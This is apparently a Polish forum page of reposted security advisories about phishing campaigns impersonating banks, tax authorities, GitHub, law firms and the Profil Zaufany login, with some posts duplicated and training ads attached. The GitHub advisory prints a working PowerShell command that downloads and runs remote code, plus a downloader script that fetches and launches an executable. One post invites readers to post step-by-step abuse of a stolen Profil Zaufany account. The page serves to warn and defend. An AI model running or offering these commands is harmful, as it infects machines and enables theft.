Znajdź zawartość
Wyświetlanie wyników dla tagów 'uwaga' lub '' .
Znaleziono 97 wyników
-
Od kilku dni otrzymujemy zgłoszenia od różnych firm, że na ich adresy wysłano wezwania do zaprzestania naruszeń praw autorskich. Pisma zawierają logotypy znanych kancelarii prawnych, np. Wardynski & Partners, CMS Poland, K&L Gates, JDP Drapała & Partners i przywołują znane marki, np. CD Projekt, Kino Świat, Mono Group jako podmioty, których prawa autorskie miał naruszyć odbiorca pisma. Oto jak wyglądają przykładowe pisma: Wiadomości zawierają link do PDF-a z “dowodami naruszeń” praw autorskich. Po kliknięciu w niego następuje pobranie pliku ZIP w którym znajduje się złośliwa aplikacja. Jej uruchomienie infekuje komputer i powoduje kradzież danych użytkownika, w tym informacji pozwalających na przejęcie np. firmowego profilu na Facebooku. Czy te wiadomości są wiarygodne dla ich odbiorców? Jak informuje nas jedna z osób, która otrzymała pismo podobne do powyższych: Po otrzymaniu wiadomości myślałam, że chodzi o podkład muzyczny do jednej z moich dzisiejszych rolek. W piśmie nie było do niej linka, ale wiadomość zawierała poprawny ID konta na Facebooku i dane kancelarii na papeterii się zgadzały. Trochę podniosło mi to ciśnienie. Dopiero po pobraniu pliku i rozpakowaniu, kiedy nie widziałam PDF-a przyszło opamiętanie. Twórcy otrzymują podobne wiadomości od platform i zawsze podnoszą one ciśnienie bo mogą oznaczać stratę profilu na który długo się pracowało. Przyznaję, że nie myślałam rozsądnie, kiedy klikałam w załącznik. Dopiero potem zdałam sobie sprawę, że wiadomość wysłano ze zwykłego Gmaila. No ale była naprawdę dopracowana moim zdaniem. Otrzymałem taką wiadomość — co robić, jak żyć? Jeśli otrzymałeś taką wiadomość, nic nie musisz robić. Możesz ją zignorować. Żadne Twoje dane nie wyciekły, a żadna z opublikowanych przez Ciebie treści nie naruszyła praw autorskich innych firm. Jeśli pobrałeś załącznik i rozpakowałeś archiwum ZIP — nie zostałeś zainfekowany. Jeśli pobrałeś załącznik, rozpakowałeś go i uruchomiłeś aplikację z załącznika, to jak najszybciej poddaj swój komputer analizie pod kątem złośliwego oprogramowania z innego urządzenia zaloguj się na wszystkie istotne konta oraz zmień na nich hasła, a tam gdzie to możliwe, wyloguj również “pozostałe sesje/urządzenia”. Wysłaliśmy CyberAlert Ze względu na skalę ataku, omijanie filtrów antyspamowych oraz użycie wiarygodnych informacji na temat nadawcy oraz odbiorcy postanowiliśmy ostrzec przed tym atakiem użytkowników naszej bezpłatnej aplikacji CyberAlerty. Jeśli też chcesz być informowany o atakach, które mogą stanowić zagrożenie dla Twoich danych, pieniędzy lub prywatności, zainstaluj aplikację CyberAlerty z oficjalnego sklepu Google lub Apple. Przeczytaj cały wpis
-
- 1
-
-
- cybersecurity
- cyberbezpieczeństwo
- (i 4 więcej)
-
⚠️ Uwaga na fałszywe doładowania telefonów w Plusie
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Otrzymujemy zgłoszenia dotyczące fałszywych serwisów internetowych służących do doładowywania telefonów na kartę. Fałszywe strony pojawiają się jako pierwszy wynik wyszukiwania w Google np. na frazę “plus doładowanie” (pozycja ta została wykupiona w ramach reklam Google): Uzupełnienie formularzy i zakup doładowania telefonu na nieoficjalnych stronach może spowodować kradzież zarówno pieniędzy jak i danych osobowych. Jeśli posiadasz telefon na kartę, który musi być doładowywany, rekomendujemy uzupełnianie środków na koncie wyłącznie poprzez: oficjalną stronę Twojego operatora, Twoją aplikację bankową zakup kodu dołądowania w sklepach stacjonarnych. Wysłaliśmy CyberAlert! Chociaż liczba zgłoszeń jaką otrzymaliśmy w sprawie tej kampanii wykorzystującej markę Plusa nie była wystarczająco duża, aby zgodnie z naszymi zasadami zakwalifikować ten atak jako taki, przed którym należy wysłać ostrzeżenie użytkownikom naszej aplikacji CyberAlerty, to postanowiliśmy zrobić wyjątek. Spodziewamy się bowiem, że niebawem mogą pojawić się kolejne fałszywe strony, tym razem wykorzystujące marki pozostałych operatorów komórkowych. Przeczytaj cały wpis-
- 1
-
-
- cybersecurity
- cyberbezpieczeństwo
- (i 4 więcej)
-
⚠️ Uwaga klienci ING, Paribas, Aliora i Santandera
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Otrzymujemy informacje o ataku SMS wymierzonym w klientów banku ING, Alior Banu i BNP Paribas. Podobne ataki były niedawno wycelowane w klientów banku Santander*. Dlatego niezależnie od tego, w którym banku posiadasz rachunek, przeczytaj poniższy artykuł. Oto wiadomość, która jest aktualnie wysyłana przez przestępców: Zawarty w wiadomości link kieruje na fałszywą stronę, udającą formularz logowania do bankowości ING. Po podaniu loginu, od ofiary wyłudzany jest PESEL. Tego typu dane, wraz z innymi informacjami wyłudzonymi przez przestępców od ofiary przestępcy mogą posłużyć do aktywacji aplikacji mobilnej banku na kontrolowanych przez oszustów smartfonach. To z kolei może doprowadzić do kradzieży środków z rachunku ofiary. Jeśli otrzymałeś tę wiadomość i wprowadziłeś dane logowania, natychmiast skontaktuj się z infolinią banku! Jak rozpoznać, że to oszustwo? Aby zorientować się, że w przypadku tego ataku mamy do czynienia z oszustwem wystarczyłoby zastosować podstawową zasadę bezpieczeństwa: Zawsze sprawdzaj adres URL, kiedy wprowadzasz dane logowania. W tym przypadku widać domenę, która nie jest poprawną domeną banku ING Wysłaliśmy CyberAlert w tej sprawie Ze względu na kolejny wariant tej samej kampanii, zdecydowaliśmy się ostrzec przed nią użytkowników naszej bezpłatnej aplikacji CyberAlerty. Aplikacja nie wymaga rejestracji i jedyne co robi, to wysyła alerty przed atakami, które mogą Ci zagrażać. Jeśli też chcesz być informowany o zagrożeniach, które mogą narazić Cię na stratę pieniędzy, danych lub prywatności zainstaluj aplikację na Androida lub iPhona. Dziękujemy wszystkim Czytelnikom, którzy podesłali nam informacje o powyższych atakach. To dzięki Wam możemy ostrzegać innych przed możliwymi niedogodnościami. Zgłoszenia możecie nam przesyłać na adres [email protected] lub wprost z aplikacji CyberAlerty — * — Nie chodzi nam o wysyłane dziś wiadomości do klientów Santandera ze słowem “test” — te były pomyłką banku ;-) Przeczytaj cały wpis -
Ktoś podszywa się pod “e-Urząd Skarbowy” i wysyła wiadomości na smartfony Polaków. Oto treść wiadomości: Wiadomość zawiera linka do login-gov-pl[.]surge.sh który przekierowuje na adres pz-gvv[.]pl. Tam znajduje się strona podszywająca się pod Profil Zaufany i wyłudzająca login i hasło. Jeśli otrzymałeś taką wiadomość i jeśli wprowadziłeś dane logowania do Profili Zaufanego na stronie oszustów, to natychmiast zadzwoń na infolinię +48 (42) 253 54 50 i zgłoś to operatorowi. jeśli wybrałeś opcję logowania przez bank i wpisałeś dane do bankowości, to natychmiast zadzwoń na infolinię swojego banku! Czym grozić może dostęp do czyjegoś konta bankowego, to już wszyscy wiedzą, ale przy okazji, zwróćmy uwagę na to, czym grozi dostęp do czyjegoś Profilu Zaufanego. O ile sam nieautoryzowany dostęp do czyjegoś konta na pz.gov.pl nie stanowi dużego problemu, to przy pomocy PZ-tum czy może raczej “tych samych danych logowania” można dostać się do innych rządowych serwisów lub podpisywać dokumenty. Przestępcy mogą więc w imieniu ofiar nie tylko podejrzeć ich szczegółowe dane z rządowych rejestrów, ale także składać wnioski (np. o nowe dokumenty), zmieniać dyspozycje i w konsekwencji narazić na straty finansowe. KONKURS Swoją drogą, może przy okazji zrobimy mały konkurs? Jaką najstraszniejszą rzecz można wykonać mając wyłącznie dostęp do czyjegoś Profilu Zaufanego? Wpisujcie instrukcje takiej operacji krok-po-kroku w komentarzach pod tym artykułem. Za kilka dni wybierzemy zwycięzcę, którego nagrodzimy darmową wejściówką na dowolny termin naszego wykładu “Jak nie dać się zhackować?“, które już niebawem odbędą się w Krakowie, Poznaniu, Wrocławiu, Gdańsku i Warszawie. Na tym wykładzie pokazujemy dziesiątki różnych ataków na żywo, także tych z użyciem Profilu Zaufanego. Jak rozpoznać, że to oszustwo? Aby zorientować się, że w przypadku tego ataku mamy do czynienia z oszustwem wystarczy stosować podstawową zasadę: Zawsze sprawdź adres URL, zanim wpiszesz swoje dane logowania. W tym przypadku widać domenę, która nie jest poprawną dla Profilu Zaufanego domeną rządową Na koniec odnotujmy, że przed podobnym atakiem, aczkolwiek realizowanym e-mailowo, ostrzegaliśmy w zeszłym tygodniu. Wysłaliśmy CyberAlert w tej sprawie Ze względu na wagę pozyskiwanych danych postanowiliśmy ostrzec przed tym atakiem nie tylko za pomocą zwykłego artykułu, ale także w formie alertu, który rozesłaliśmy do użytkowników naszej bezpłatnej aplikacji CyberAlerty. Aplikacja nie wymaga rejestracji i jedyne co robi, to wysyła alerty przed atakami, które mogą Ci zagrażać. Jeśli też chcesz być informowany o zagrożeniach, które mogą narazić Cię na stratę pieniędzy, danych lub prywatności zainstaluj aplikację na Androida lub iPhona. Dziękujemy wszystkim Czytelnikom, którzy podesłali nam informacje o powyższych atakach. To dzięki Wam możemy ostrzegać innych przed możliwymi niedogodnościami. Zgłoszenia możecie nam przesyłać na adres [email protected] lub wprost z aplikacji CyberAlerty Przeczytaj cały wpis
-
- 2
-
-
- cybersecurity
- cyberbezpieczeństwo
- (i 7 więcej)
-
Ktoś podszywa się pod “e-Urząd Skarbowy” i wysyła wiadomości na smartfony Polaków. Oto treść wiadomości: Wiadomość zawiera linka do login-gov-pl[.]surge.sh który przekierowuje na adres pz-gvv[.]pl. Tam znajduje się strona podszywająca się pod Profil Zaufany i wyłudzająca login i hasło. Jeśli otrzymałeś taką wiadomość i jeśli wprowadziłeś dane logowania do Profili Zaufanego na stronie oszustów, to natychmiast zadzwoń na infolinię +48 (42) 253 54 50 i zgłoś to operatorowi. jeśli wybrałeś opcję logowania przez bank i wpisałeś dane do bankowości, to natychmiast zadzwoń na infolinię swojego banku! Czym grozić może dostęp do czyjegoś konta bankowego, to już wszyscy wiedzą, ale przy okazji, zwróćmy uwagę na to, czym grozi dostęp do czyjegoś Profilu Zaufanego. O ile sam nieautoryzowany dostęp do czyjegoś konta na pz.gov.pl nie stanowi dużego problemu, to przy pomocy PZ-tum czy może raczej “tych samych danych logowania” można dostać się do innych rządowych serwisów lub podpisywać dokumenty. Przestępcy mogą więc w imieniu ofiar nie tylko podejrzeć ich szczegółowe dane z rządowych rejestrów, ale także składać wnioski (np. o nowe dokumenty), zmieniać dyspozycje i w konsekwencji narazić na straty finansowe. KONKURS Swoją drogą, może przy okazji zrobimy mały konkurs? Jaką najstraszniejszą rzecz można wykonać mając wyłącznie dostęp do czyjegoś Profilu Zaufanego? Wpisujcie instrukcje takiej operacji krok-po-kroku w komentarzach pod tym artykułem. Za kilka dni wybierzemy zwycięzcę, którego nagrodzimy darmową wejściówką na dowolny termin naszego wykładu “Jak nie dać się zhackować?“, które już niebawem odbędą się w Krakowie, Poznaniu, Wrocławiu, Gdańsku i Warszawie. Na tym wykładzie pokazujemy dziesiątki różnych ataków na żywo, także tych z użyciem Profilu Zaufanego. Jak rozpoznać, że to oszustwo? Aby zorientować się, że w przypadku tego ataku mamy do czynienia z oszustwem wystarczy stosować podstawową zasadę: Zawsze sprawdź adres URL, zanim wpiszesz swoje dane logowania. W tym przypadku widać domenę, która nie jest poprawną dla Profilu Zaufanego domeną rządową Na koniec odnotujmy, że przed podobnym atakiem, aczkolwiek realizowanym e-mailowo, ostrzegaliśmy w zeszłym tygodniu. Wysłaliśmy CyberAlert w tej sprawie Ze względu na wagę pozyskiwanych danych postanowiliśmy ostrzec przed tym atakiem nie tylko za pomocą zwykłego artykułu, ale także w formie alertu, który rozesłaliśmy do użytkowników naszej bezpłatnej aplikacji CyberAlerty. Aplikacja nie wymaga rejestracji i jedyne co robi, to wysyła alerty przed atakami, które mogą Ci zagrażać. Jeśli też chcesz być informowany o zagrożeniach, które mogą narazić Cię na stratę pieniędzy, danych lub prywatności zainstaluj aplikację na Androida lub iPhona. Dziękujemy wszystkim Czytelnikom, którzy podesłali nam informacje o powyższych atakach. To dzięki Wam możemy ostrzegać innych przed możliwymi niedogodnościami. Zgłoszenia możecie nam przesyłać na adres [email protected] lub wprost z aplikacji CyberAlerty Przeczytaj cały wpis
-
⚠️ Uwaga na e-maile od Krajowej Administracji Skarbowej
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Otrzymujemy zgłoszenia o fali fałszywych wiadomości e-mail w których ktoś podszywa się pod Krajową Administrację Skarbową w — trzeba to przyznać — dość dobrze dopracowany sposób. Oto jak wygląda e-mail: Zwróćcie uwagę na to, jak zapisana została nazwa “Ḳrajowa Administracja Ṣkarbowa” — widzicie drobne różnice? Choć taki zapis może łatwo wprowadzić kogoś w błąd, to jeśli przyjrzymy się adresowi e-mail nadawcy, będzie jasne, że to scam, no chyba że KAS ma swój oddział terenowy w Iranie i Chile ;) Oto przykładowe adresy, z jakich powyższa wiadomość jest rozsyłana: ḲrajowaAdministracjaṢ[email protected] ḲrajowaAdministracjaṢ[email protected] ḲrajowaAdministracjaṢ[email protected] ḲrajowaAdministracjaṢ[email protected] Wiadomość zawiera link. Gdzie się trafi, kiedy się na niego kliknie? Na stronę rcube-session[.]top podszywającą się pod E-Urząd Skarbowy: Okienko logowania na fałszywej stronie jest “spersonalizowane“, co znów podnosi wiarygodność ataku — choć ofiara nawet na tym etapie może się zorientować, że to oszustwo, patrząc na adres URL. Celem kampanii jest wyłudzenie hasła — po co? To dobre pytanie. Ale na tym etapie brakuje nam informacji, żeby na nie odpowiedzieć. Czyżby celem atakujących było pozyskanie danych osobowych? Większość z osób, która otrzymała tę wiadomość zajmuje się usługami księgowymi / rachunkowymi. Domyślamy się — ale to mogą być nietrafine hipotezy — że atakujący liczą na to, że z poziomu ich kont będą mieli wgląd w dane wielu innych podmiotów. Jeśli wiecie do czego “najstraszniejszego” można wykorzystać konta księgowych w rządowym serwisie podatkowym, to dajcie znać. Jak się zabezpieczyć przed takim atakiem? Aby nie zostać ofiarą tego ataku, wystarczy stosować dwie podstawowe zasady bezpieczeństwa: Weryfikuj domenę w adresie nadawcy. W przypadku tego ataku, domeny nie należały ani do KAS ani do ePUAP-u. Nie były to też domeny w “gov.pl”, czego należałoby się spodziewać biorąc pod uwagę treść wiadomości. Weryfikuj domenę w adresie URL zanim wpiszesz swoje hasło. W tym przypadku, choć strona logowania wyglądem przypominała serwisy rządowe, to domena była niepoprawna Inne “znaki” świadczące o tym, że ta wiadomość to atak, to oczywiście “dziwne literki” w nazwie Krajowej Administracji Skarbowej oraz sama treść wiadomości — PIT17 nie istnieje, a cytowane “PESEL-e” nie pokrywały się z numerami PESEL odbiorców wiadomości. Wysłaliśmy CyberAlert w tej sprawie Ze względu na liczbę zgłoszeń oraz podmiot, pod który podszywają się oszuści postanowiliśmy ostrzec przed tym atakiem nie tylko za pomocą zwykłego artykułu, ale także jako alert, który rozesłaliśmy do użytkowników naszej bezpłatnej aplikacji CyberAlerty. Jeśli też chcesz być informowany o zagrożeniach, które mogą narazić Cię na stratę pieniędzy, danych lub prywatności zainstaluj aplikację na Androida lub iPhona. Aplikacja nie wymaga rejestracji i jedyne co robi, to wysyła alerty przed atakami, które mogą Ci zagrażać. Dziękujemy wszystkim Czytelnikom, którzy podesłali nam informacje o powyższych atakach. To dzięki Wam możemy ostrzegać innych przed możliwymi niedogodnościami. Zgłoszenia możecie nam przesyłać na adres [email protected] lub wprost z aplikacji CyberAlerty Przeczytaj cały wpis -
⚠️ Uwaga na e-maile od Krajowej Administracji Skarbowej
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Otrzymujemy zgłoszenia o fali fałszywych wiadomości e-mail w których ktoś podszywa się pod Krajową Administrację Skarbową w — trzeba to przyznać — dość dobrze dopracowany sposób. Oto jak wygląda e-mail: Zwróćcie uwagę na to, jak zapisana została nazwa “Ḳrajowa Administracja Ṣkarbowa” — widzicie drobne różnice? Choć taki zapis może łatwo wprowadzić kogoś w błąd, to jeśli przyjrzymy się adresowi e-mail nadawcy, będzie jasne, że to scam, no chyba że KAS ma swój oddział terenowy w Iranie i Chile ;) Oto przykładowe adresy, z jakich powyższa wiadomość jest rozsyłana: ḲrajowaAdministracjaṢ[email protected] ḲrajowaAdministracjaṢ[email protected] ḲrajowaAdministracjaṢ[email protected] ḲrajowaAdministracjaṢ[email protected] Wiadomość zawiera link. Gdzie się trafi, kiedy się na niego kliknie? Na stronę rcube-session[.]top podszywającą się pod E-Urząd Skarbowy: Okienko logowania na fałszywej stronie jest “spersonalizowane“, co znów podnosi wiarygodność ataku — choć ofiara nawet na tym etapie może się zorientować, że to oszustwo, patrząc na adres URL. Celem kampanii jest wyłudzenie hasła — po co? To dobre pytanie. Ale na tym etapie brakuje nam informacji, żeby na nie odpowiedzieć. Czyżby celem atakujących było pozyskanie danych osobowych? Większość z osób, która otrzymała tę wiadomość zajmuje się usługami księgowymi / rachunkowymi. Domyślamy się — ale to mogą być nietrafine hipotezy — że atakujący liczą na to, że z poziomu ich kont będą mieli wgląd w dane wielu innych podmiotów. Jeśli wiecie do czego “najstraszniejszego” można wykorzystać konta księgowych w rządowym serwisie podatkowym, to dajcie znać. Jak się zabezpieczyć przed takim atakiem? Aby nie zostać ofiarą tego ataku, wystarczy stosować dwie podstawowe zasady bezpieczeństwa: Weryfikuj domenę w adresie nadawcy. W przypadku tego ataku, domeny nie należały ani do KAS ani do ePUAP-u. Nie były to też domeny w “gov.pl”, czego należałoby się spodziewać biorąc pod uwagę treść wiadomości. Weryfikuj domenę w adresie URL zanim wpiszesz swoje hasło. W tym przypadku, choć strona logowania wyglądem przypominała serwisy rządowe, to domena była niepoprawna Inne “znaki” świadczące o tym, że ta wiadomość to atak, to oczywiście “dziwne literki” w nazwie Krajowej Administracji Skarbowej oraz sama treść wiadomości — PIT17 nie istnieje, a cytowane “PESEL-e” nie pokrywały się z numerami PESEL odbiorców wiadomości. Wysłaliśmy CyberAlert w tej sprawie Ze względu na liczbę zgłoszeń oraz podmiot, pod który podszywają się oszuści postanowiliśmy ostrzec przed tym atakiem nie tylko za pomocą zwykłego artykułu, ale także jako alert, który rozesłaliśmy do użytkowników naszej bezpłatnej aplikacji CyberAlerty. Jeśli też chcesz być informowany o zagrożeniach, które mogą narazić Cię na stratę pieniędzy, danych lub prywatności zainstaluj aplikację na Androida lub iPhona. Aplikacja nie wymaga rejestracji i jedyne co robi, to wysyła alerty przed atakami, które mogą Ci zagrażać. Dziękujemy wszystkim Czytelnikom, którzy podesłali nam informacje o powyższych atakach. To dzięki Wam możemy ostrzegać innych przed możliwymi niedogodnościami. Zgłoszenia możecie nam przesyłać na adres [email protected] lub wprost z aplikacji CyberAlerty Przeczytaj cały wpis-
- 2
-
-
- cybersecurity
- cyberbezpieczeństwo
- (i 6 więcej)
-
Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści: fot. przesłana prze z Jana Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to: Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę: powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX" A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem: $webClient = New-Object System.Net.WebClient $url1 = "https://github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka… Na jakie jeszcze ataki powinni uważać programiści? Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki i nauka niezliczonych technik i narzędzi, które pokazują jak można “zhackować” webaplikację i oczywiście — jak się przed takimi atakami poprawnie zabezpieczyć. Gdańsk: 03-04 października 2024r. — UWAGA: zostały tylko 2 wolne miejsca Ostatnio ktoś zarejestrował się 10 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 20 września) 2699 PLN netto (od 21 września) Warszawa: 07-08 października 2024r. — UWAGA: zostały tylko 4 wolne miejsca Ostatnio ktoś zarejestrował się 16 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 20 września) 2699 PLN netto (od 21 września) ZDALNIE: 19-20 października 2024r. — zostało 5 wolnych miejsc Ostatnio ktoś zarejestrował się 18 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 20 września) 2699 PLN netto (od 21 września) Kraków: 18-19 listopada 2024r. — zostało 7 wolnych miejsc Ostatnio ktoś zarejestrował się 19 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 27 września) 2699 PLN netto (od 28 września) Warszawa: 16-17 grudnia 2024r. — zostało 9 wolnych miejsc Ostatnio ktoś zarejestrował się 19 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 27 września) 2699 PLN netto (od 28 września) Większość uczestników tego szkolenia opłaca je z firmowego budżetu szkoleniowego, jeśli potrzebujesz argumentów, aby przekonać swojego szefa, żeby Cię wysłał na to szkolenie, napisz na [email protected], a nasze koleżanki prześlą Ci PDF dla szefa :) PS. Jeśli zarejestrujesz się na któryś z powyższych terminów z kodem “GITHUB” do końca tygodnia, to otrzymasz zniżkę w wysokości 100 PLN. Przeczytaj cały wpis -
Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści: fot. przesłana prze z Jana Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to: Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę: powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX" A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem: $webClient = New-Object System.Net.WebClient $url1 = "https://github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka… Na jakie jeszcze ataki powinni uważać programiści? Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki i nauka niezliczonych technik i narzędzi, które pokazują jak można “zhackować” webaplikację i oczywiście — jak się przed takimi atakami poprawnie zabezpieczyć. ZDALNIE: 19-20 października 2024r. — UWAGA: zostało tylko 1 wolne miejsce Ostatnio ktoś zarejestrował się 10 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 11 października) 2699 PLN netto (od 12 października) Kraków: 18-19 listopada 2024r. — UWAGA: zostało tylko 1 wolne miejsce Ostatnio ktoś zarejestrował się 10 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 11 października) 2699 PLN netto (od 12 października) ZDALNIE: 25-26 listopada 2024r. — zostało 7 wolnych miejsc Ostatnio ktoś zarejestrował się 11 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 11 października) 2699 PLN netto (od 12 października) Warszawa: 16-17 grudnia 2024r. — zostało 7 wolnych miejsc Ostatnio ktoś zarejestrował się 09 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 18 października) 2699 PLN netto (od 19 października) Poznań: 20-21 stycznia 2025r. — zostało 9 wolnych miejsc Ostatnio ktoś zarejestrował się 02 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 25 października) 2699 PLN netto (od 26 października) Gdańsk: 07-08 kwietnia 2025r. — zostało 9 wolnych miejsc Ostatnio ktoś zarejestrował się 11 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 25 października) 2699 PLN netto (od 26 października) Większość uczestników tego szkolenia opłaca je z firmowego budżetu szkoleniowego, jeśli potrzebujesz argumentów, aby przekonać swojego szefa, żeby Cię wysłał na to szkolenie, napisz na [email protected], a nasze koleżanki prześlą Ci PDF dla szefa :) PS. Jeśli zarejestrujesz się na któryś z powyższych terminów z kodem “GITHUB” do końca tygodnia, to otrzymasz zniżkę w wysokości 100 PLN. Przeczytaj cały wpis -
⚠️ Uwaga na e-maile o odnowieniu Profilu Zaufanego
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Otrzymujemy zgłoszenia o kampanii e-mail, która jest rozsyłana na skrzynki Polaków. Wiadomości podszywają się pod rząd i informują o “kontroli”. Proszą też o odnowienie profilu, które wymaga wyboru banku, którym będziemy się logować. Kliknięcie w linka z tej wiadomości i podanie loginu i hasła do banku może skutkować kradzieżą pieniędzy z Twojego rachunku. Oto jak wyglądają wiadomości: Szanowny Uzytkowniku, Przeprowadzenie jednorazowej kontroli jest niezbedne. Prosimy, abys to zrobil przed 12.09.2024. W przeciwnym razie bedziemy zmuszeni zablokowac Twoje konto. Jesli masz jakiekolwiek pytania lub potrzebujesz wsparcia, skontaktuj sie z naszym zespolem pod adresem e-mail: [email protected]. Z góry dziekujemy za szybkie zalatwienie tej sprawy. Z powazaniem, Zespól MojeRzadu Odnów Profil [LINK] 2024 MojeRzadu. Wszelkie prawa zastrzezone. Po kliknięciu na link z wiadomości ofiara przenoszona jest na stronę moja-ochrona[.]top gdzie są jej prezentowane ikony kilku banków. Jeśli ofiara po wyborze swojego banku w kolejnych krokach poda dane o które proszą oszuści, z jej rachunku mogą zostać skradzione pieniądze. Otrzymałem tę wiadomość, czy coś mi grozi? Nie, samo otrzymanie wiadomości nie narazi Cię na żadne szkody. Nie oznacza też, że Twój adres e-mail wyciekł z serwisów rządowych. Te e-maile są wysyłane masowo na różne adresy e-mail. Na marginesie: jeśli nie jesteś pewien czy otrzymany e-mail jest prawdziwy, zawsze możesz go nam podesłać do weryfikacji na [email protected] Kliknąłem w linka, czy coś mi grozi? Nie, samo kliknięcie tym razem nie skutkuje żadnymi negatywnymi skutkami. Ale jeśli na stronie podszywającej się pod rządowy serwis wybrałeś swój bank i podałeś dane dostępowe, natychmiast skontaktuj się z infolinią swojego banku, ponieważ Twoje pieniądze mogą być zagrożone! To kolejny tego typu atak Ta kampania jest podobna do kampanii o której ostrzegaliśmy dwa miesiące temu, przestępcy dalej stosują tę samą nazwę nadawcy (z tym samym błędem) ale nową domenę. Nie spodziewamy się, że będzie wiele ofiar, ale mimo wszystko, ze względu na masowy charakter tej kampanii zdecydowaliśmy się ostrzec przed nią użytkowników naszej aplikacji CyberAlerty. Jeśli też chcesz być ostrzegany przed atakami, które mogą zagrozić Twoim danym lub oszczędnościom to zainstaluj apkę CyberAlerty z oficjalnego sklepu Google lub Apple. Aplikacja jest darmowa, nie wymaga rejestracji i jedyne co robi, to wysyła alerty przed atakami, które są wycelowane w Twoje pieniądze, dane lub prywatność. Dziękujemy wszystkim Czytelnikom, którzy podesłali nam informacje o tym ataku. To dzięki Wam możemy ostrzegać innych przed możliwymi niedogodnościami . Zgłoszenia możecie nam przesyłać na adres [email protected] lub wprost z aplikacji CyberAlerty Przeczytaj cały wpis -
⚠️ Uwaga na e-maile o wygaśnięciu profilu zaufanego
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Wczoraj późnym wieczorem na skrzynki Polaków została rozesłana fałszywa wiadomość, w której przestępcy podszywając się pod GOV.PL informują o zbliżającym się terminie wygaśnięcia profilu zaufanego. Oto treść tej wiadomości: Szanowny Uzytkowniku, Chcemy poinformowac, ze Twój zaufany profil wygasnie w dniu 05-07-24. Aby zapewnic nieprzerwany dostep do Twojego konta i zachowac waznosc profilu, prosimy o zalogowanie sie i odnowienie profilu przed data wygasniecia. Jesli masz jakiekolwiek pytania lub potrzebujesz pomocy, skontaktuj sie z naszym zespolem wsparcia pod adresem [email protected]. Dziekujemy za szybka uwage na te sprawe. Z powazaniem, Zespól MojeRzadu Kliknięcie w przycisk “odnów profil” prowadzi do strony wyłudzającej dane do bankowości internetowej, ale ponieważ do Profilu Zaufanego można logować się przez swój bank, wiele osób może “złapać haczyk” i podać oszustom dane do swojej bankowości, narażając się na kradzież oszczędności. Dlatego, jeśli wprowadziłeś login i hasło na tej stronie, natychmiast skontaktuj się ze swoim bankiem! Wiadomość wysłana została z domeny “bluewin.ch”, jest podpisana jako “Zespól MojeRzadu”, a przycisk prowadzi do fałszywej strony w domenie mojego-rzadu.com. Sporo jest więc znaków, że coś tu nie gra. Nie spodziewamy się, że będzie wiele ofiar, ale mimo wszystko, ze względu na masowy charakter tej 